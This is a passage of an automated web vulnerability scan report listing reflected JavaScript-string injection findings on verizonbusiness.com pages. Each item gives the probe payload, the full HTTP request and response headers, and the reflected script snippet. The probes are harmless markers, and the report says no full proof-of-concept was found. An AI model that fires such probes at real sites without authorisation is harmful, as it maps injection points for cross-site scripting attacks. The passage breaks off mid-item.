Date: Wed, 17 Nov 2010 00:45:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking3caf0";22325909194/internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.234. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f1e'%3beb3918f56c5 was submitted in the REST URL parameter 2. This input was echoed as 88f1e';eb3918f56c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking88f1e'%3beb3918f56c5/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:26 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking88f1e';eb3918f56c5/internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.235. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 361a8'%3bc8c470b71d7 was submitted in the REST URL parameter 3. This input was echoed as 361a8';c8c470b71d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/internet361a8'%3bc8c470b71d7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43214
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/internet361a8';c8c470b71d7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.236. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36d38"%3b3ed89cff44e was submitted in the REST URL parameter 3. This input was echoed as 36d38";3ed89cff44e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/internet36d38"%3b3ed89cff44e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/internet36d38";3ed89cff44e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.237. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1987d'%3b52bd6c80198 was submitted in the REST URL parameter 1. This input was echoed as 1987d';52bd6c80198 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1987d'%3b52bd6c80198/networking/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products1987d';52bd6c80198/networking/managed'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.238. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9581f"%3b51c8487271 was submitted in the REST URL parameter 1. This input was echoed as 9581f";51c8487271 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9581f"%3b51c8487271/networking/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:51 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products9581f";51c8487271/networking/managed";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.239. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7935"%3b2b00390ac05 was submitted in the REST URL parameter 2. This input was echoed as f7935";2b00390ac05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingf7935"%3b2b00390ac05/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingf7935";2b00390ac05/managed";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTI
...[SNIP]...

1.240. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7a7b'%3b472d1722e77 was submitted in the REST URL parameter 2. This input was echoed as b7a7b';472d1722e77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingb7a7b'%3b472d1722e77/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingb7a7b';472d1722e77/managed'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.241. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63993"%3b7dc5d26df90 was submitted in the REST URL parameter 3. This input was echoed as 63993";7dc5d26df90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managed63993"%3b7dc5d26df90 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43190
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/managed63993";7dc5d26df90";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.242. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51faf'%3b743859d0131 was submitted in the REST URL parameter 3. This input was echoed as 51faf';743859d0131 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managed51faf'%3b743859d0131 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43190
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/managed51faf';743859d0131'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.243. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9887"%3b1caa27de616 was submitted in the REST URL parameter 1. This input was echoed as d9887";1caa27de616 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd9887"%3b1caa27de616/networking/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsd9887";1caa27de616/networking/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.244. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ae0'%3b13bdef133f1 was submitted in the REST URL parameter 1. This input was echoed as e0ae0';13bdef133f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse0ae0'%3b13bdef133f1/networking/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productse0ae0';13bdef133f1/networking/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.245. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e067'%3bda09bfe68dd was submitted in the REST URL parameter 2. This input was echoed as 6e067';da09bfe68dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking6e067'%3bda09bfe68dd/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking6e067';da09bfe68dd/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.246. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8085a"%3b9a4165e21d9 was submitted in the REST URL parameter 2. This input was echoed as 8085a";9a4165e21d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking8085a"%3b9a4165e21d9/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:25 GMT

